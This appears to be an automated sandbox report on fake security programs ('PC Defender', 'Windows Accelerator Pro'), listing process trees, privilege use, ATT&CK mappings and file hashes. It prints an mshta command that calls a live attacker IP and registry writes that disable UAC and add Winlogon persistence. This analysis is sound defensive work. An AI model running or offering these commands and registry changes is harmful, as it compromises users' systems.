description pid Process Token: SeShutdownPrivilege 4972 msiexec.exe Token: SeIncreaseQuotaPrivilege 4972 msiexec.exe Token: SeSecurityPrivilege 4452 msiexec.exe Token: SeCreateTokenPrivilege 4972 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4972 msiexec.exe Token: SeLockMemoryPrivilege 4972 msiexec.exe Token: SeIncreaseQuotaPrivilege 4972 msiexec.exe Token: SeMachineAccountPrivilege 4972 msiexec.exe Token: SeTcbPrivilege 4972 msiexec.exe Token: SeSecurityPrivilege 4972 msiexec.exe Token: SeTakeOwnershipPrivilege 4972 msiexec.exe Token: SeLoadDriverPrivilege 4972 msiexec.exe Token: SeSystemProfilePrivilege 4972 msiexec.exe Token: SeSystemtimePrivilege 4972 msiexec.exe Token: SeProfSingleProcessPrivilege 4972 msiexec.exe Token: SeIncBasePriorityPrivilege 4972 msiexec.exe Token: SeCreatePagefilePrivilege 4972 msiexec.exe Token: SeCreatePermanentPrivilege 4972 msiexec.exe Token: SeBackupPrivilege 4972 msiexec.exe Token: SeRestorePrivilege 4972 msiexec.exe Token: SeShutdownPrivilege 4972 msiexec.exe Token: SeDebugPrivilege 4972 msiexec.exe Token: SeAuditPrivilege 4972 msiexec.exe Token: SeSystemEnvironmentPrivilege 4972 msiexec.exe Token: SeChangeNotifyPrivilege 4972 msiexec.exe Token: SeRemoteShutdownPrivilege 4972 msiexec.exe Token: SeUndockPrivilege 4972 msiexec.exe Token: SeSyncAgentPrivilege 4972 msiexec.exe Token: SeEnableDelegationPrivilege 4972 msiexec.exe Token: SeManageVolumePrivilege 4972 msiexec.exe Token: SeImpersonatePrivilege 4972 msiexec.exe Token: SeCreateGlobalPrivilege 4972 msiexec.exe Token: SeBackupPrivilege 1648 vssvc.exe Token: SeRestorePrivilege 1648 vssvc.exe Token: SeAuditPrivilege 1648 vssvc.exe Token: SeBackupPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe Token: SeTakeOwnershipPrivilege 4452 msiexec.exe Token: SeRestorePrivilege 4452 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 4972 msiexec.exe 4972 msiexec.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3624 guard-wojl.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 912 [email protected] 5720 [email protected] 3624 guard-wojl.exe 3624 guard-wojl.exe 5932 LogonUI.exe 5740 OfficeClickToRun.exe 5480 OfficeClickToRun.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3552 wrote to memory of 3252 3552 msedge.exe 81 PID 3552 wrote to memory of 3252 3552 msedge.exe 81 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 3048 3552 msedge.exe 82 PID 3552 wrote to memory of 2120 3552 msedge.exe 83 PID 3552 wrote to memory of 2120 3552 msedge.exe 83 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 PID 3552 wrote to memory of 4024 3552 msedge.exe 84 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-wojl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-wojl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-wojl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-wojl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-wojl.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Endermanch/MalwareDatabase1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe565b3cb8,0x7ffe565b3cc8,0x7ffe565b3cd82⤵PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:22⤵PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:82⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:2728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:2908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3976 /prefetch:82⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:4140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵PID:916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵PID:4260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵PID:3316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:12⤵PID:556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:12⤵PID:6112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3048 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:6136
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2528
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1444
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\Temp1_PC Defender (1).zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_PC Defender (1).zip\[email protected]"1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:912 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4972
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:1284
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C5A20BDBB329C16FCB4FD33F41577BAE E Global\MSI00002⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:792
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Windows Accelerator Pro.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_Windows Accelerator Pro.zip\[email protected]"1⤵
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:5720 -
C:\Users\Admin\AppData\Roaming\guard-wojl.exeC:\Users\Admin\AppData\Roaming\guard-wojl.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3624 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=texyhekisb"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TEMP1_~2.ZIP\ENDERM~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:3292
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39c5055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5932
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5740
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5480
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD5fd517cb902ab6cf00468ff16a012cd07
SHA1f9b22672e7dfda0fc567e00fddb58aeba642a500
SHA25675cdc4ae4394bdc20925d69a54e4a9fd4a06c3425913f11a36d38ef324db6cdf
SHA512e995c6c2b20f5ad84aaa3feefead386dfc20bdc476ecab1d7436d5fdc6ce6d579a6003aef595c2b937ccea72eb46aa42fb5e471af7606148fa409ddac89d8d68
-
Filesize
11KB
MD56923fcd47607cc681b6e83bfb00d8de2
SHA1201650ef2901aa8aa942cce40ee1c7082d3080c5
SHA25633c592853e468475edd2c40ff1dcc3acaab0c41cd60b87ef89999414d301cdc3
SHA51274c7698910dc6243f31a4f8d58dd0b09dd7072f6144d6315f349a21ab28b020e660733c472d9ec9c5d25a0a48f94b0c540b5842ade1b456678510a0dbad4d30f
-
Filesize
152B
MD52ee16858e751901224340cabb25e5704
SHA124e0d2d301f282fb8e492e9df0b36603b28477b2
SHA256e9784fcff01f83f4925f23e3a24bce63314ea503c2091f7309c014895fead33c
SHA512bd9994c2fb4bf097ce7ffea412a2bed97e3af386108ab6aab0df9472a92d4bd94489bb9c36750a92f9818fa3ea6d1756497f5364611e6ebd36de4cd14e9a0fba
-
Filesize
152B
MD5ea667b2dedf919487c556b97119cf88a
SHA10ee7b1da90be47cc31406f4dba755fd083a29762
SHA2569e7e47ebf490ba409eab3be0314fa695bf28f4764f4875c7568a54337f2df70f
SHA512832391afcac34fc6c949dee8120f2a5f83ca68c159ff707751d844b085c7496930f0c8fd8313fd8f10a5f5725138be651953934aa79b087ba3c6dd22eaa49c72
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD5678ae50766d54d2ada25c21018c79dc4
SHA1cb675b33fa285ca3f607d771b49d0166e2bf3ef6
SHA2568234355e5c32cfdc31bf84bb973091aebc4e221d64cf25c8517a96caf6943507
SHA512bec1c06ed18b024afa5a79c0df9512c34c2b7a857ee43978396438210b429e4b38cff55753b8814e9fc71ecb03be20672af78df871b775139622f4f1faa62812
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
678B
MD5277ae67e3b887293334ed7b271af025b
SHA10bdf4daecedaa7433b25977fbfbc755811d043d4
SHA2564d2e8b1b64c7aa9bedf9c9745e68721337bf4f3d264044b28827650fa1617880
SHA512e155ff850ed0d46154ce7fb7b4e0e2a3cbe04d13bccf1bd44cbad83a6dfc80e693a40979f3bc6c3593e421c563be6f63968f4db8890d10e3b95fd9c4de9150a2
-
Filesize
5KB
MD5fa7148a72fd1fd8ef8e9941147326873
SHA11abdaf1d0be0d1f843217ff4984e21ce08b5d33c
SHA256e57dac9da8557be9951cd77c7095cee74fe89348d939db0e55a473aa73cbff93
SHA5129bb8a6fa88b6228517aaa361ac6eae5eef5cf81da66909ff9272df2c311d4df39aa51d666311b470910b714739e83e72e58bdac7bb0b97df3f874f4a39b613fd
-
Filesize
6KB
MD5c60285e74cffecbf872f9052864bc449
SHA1255d8f20669b90dac0f8f93b40f5888165036741
SHA2561fbf3d508da81c7201b48d7a9e123cae5b15b9b6ef31b3e940570659e6ea9ac3
SHA512f2dc17ce925ccfa6868a76f89de2d4e05e45af6c36cc9543aae9563462b05372a2bc5b608c62403534919833cc00b36df1f1e039bcfabc6c33cc86a0bfd1bc06
-
Filesize
6KB
MD5a5653e578d8a4ed6fd028dba76e4c65a
SHA1be248103405dd3152ade34097b0f94f4fcf6310b
SHA256972e14e9df5692fe6b85a7dfa0236151b2a5d749cb5f5ad6dabb313bd87318db
SHA512babc6641d7004ea72007b587bc24e3e8beab1c2423fb8c091914117a20f9607dce15c80c141e42e6f1248ccdcf6ed57c38caa351ff6a03908b866e4bc5d1c842
-
Filesize
6KB
MD5df6484889947363d8cb201dba7adc575
SHA199a80a6dc76ba871be607bd2a2ff5d3327b656f2
SHA256aa72ed44f6d1605405e81e525558baf4c4f64dae04c06bbf6878abf302e49120
SHA5121c267ce05d80359af922793ad2eddb9039b83996fc44285917fed9586a5dccfdd8a5005aef44f6978c8e0b2aa9463d8f3f03d862bc3c1d5bec185413854967fb
-
Filesize
1KB
MD59a92166ae2b4ea0dbd9991595c62ef92
SHA174856baed057a77c371b28c2879e00eff278c9fb
SHA2565a18fc77a29c0f89a39ad2b35463ac1d853ed50e2e117708c45a72a3917cdedd
SHA512ca24ada127d252fa5559aab296406e1d70fbc42cbce1e1ede91c52346a523fe85b4c8b18e90a5379821b325414e9e2693a7e1d29f67d0bd1a7ebe1597bb67f46
-
Filesize
1KB
MD57f37861320179dc00321a4924a7cd45d
SHA1c047cb541e3fbcbb7cf825b1a69641b80748e630
SHA2565dda2763ed06f0cc27fa8a4581e739d0961e8d1dd90e5fbe693e00665fbbd117
SHA512cd2d3649354fcdd1aca9112c0a3e4d078a70210f44c09c09d22d16992b47ba982b31e7bbd336f407fd374d9204aa7c1c5d1038bb46a238a828f273880ba2876b
-
Filesize
1KB
MD5e8b8cdccb448ec168b4cd9b7e28c8e7f
SHA105a1493f19acd5059ebfc1a9eb75a66092960f16
SHA25613c8cf557aa387b2d55182796182f6bc741c406db450cac02ab714dc80a598e5
SHA51295bb6752c3af4475a538910f35cab40afc2696488e2919638316ea82bd3891f6d7224dc37094bc52e867a381fe95982b6922aa4174e1ece89b2e9bb316bcaba8
-
Filesize
1KB
MD517bf62d601a65ca77f2c7160774ffb87
SHA17e4e018ec086f3c4c10e60cacd766d8437a2f6ca
